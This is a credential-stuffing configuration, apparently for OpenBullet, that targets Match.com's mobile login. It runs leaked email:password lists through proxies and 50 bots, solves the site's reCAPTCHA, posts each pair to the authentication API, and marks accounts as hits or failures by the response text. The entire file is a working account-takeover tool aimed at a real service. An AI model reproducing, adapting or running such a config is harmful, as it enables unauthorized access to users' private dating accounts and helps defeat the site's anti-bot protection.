[SETTINGS]
{
  "Name": "Match Login",
  "SuggestedBots": 50,
  "LastModified": "2019-03-16T04:34:17.4798381+01:00",
  "AdditionalInfo": "",
  "Author": "Fairy#6869",
  "Version": "1.0.0",
  "NeedsProxies": true,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "AllowedWordlist1": "MailPass",
  "AllowedWordlist2": "None",
  "DataRules": [],
  "CustomInputs": [],
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "DisableNotifications": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": ""
}
[SCRIPT]
#Get_Main_Page REQUEST GET "https://mobi.match.com/login?to=/user" AutoRedirect=TRUE 
  CONTENT "" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "Accept: */*" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36" 
  HEADER "Pragma: no-cache" 
  HEADER "Upgrade-Insecure-Requests: 1" 
RECAPTCHA "https://mobi.match.com/login?to=/user" "6Lc4pEEUAAAAANH_jM0-5DD4MLDrMql0kBk6cfrs" -> VAR "RECAP" 
#POST REQUEST POST "https://mobi.match.com/api?locale=en-US" AutoRedirect=TRUE 
  CONTENT "{\"requests\":{\"g0\":{\"resource\":\"auth\",\"operation\":\"create\",\"params\":\"login\",\"body\":{\"email\":\"<USER>\",\"password\":\"<PASS>\",\"rememberMe\":true,\"submitted\":false,\"recaptchaResponse\":\"i:<RECAP>\",\"reactivateUrl\":\"reactivateAccount\"}}},\"context\":{\"locale\":\"en-US\"}}" 
  CONTENTTYPE "application/json" 
  HEADER "Accept: */*" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36" 
  HEADER "Pragma: no-cache" 
  HEADER "X-Requested-With: XMLHttpRequest" 
  HEADER "ADRUM: isAjax:true" 
  HEADER "Referer: https://mobi.match.com/login?to=/user" 
KEYCHECK BanOn4XX=FALSE BanOnToCheck=TRUE 
  KEYCHAIN Failure OR 
    KEY "error\":\"" 
  KEYCHAIN Success OR 
    KEY "email\":\"" 
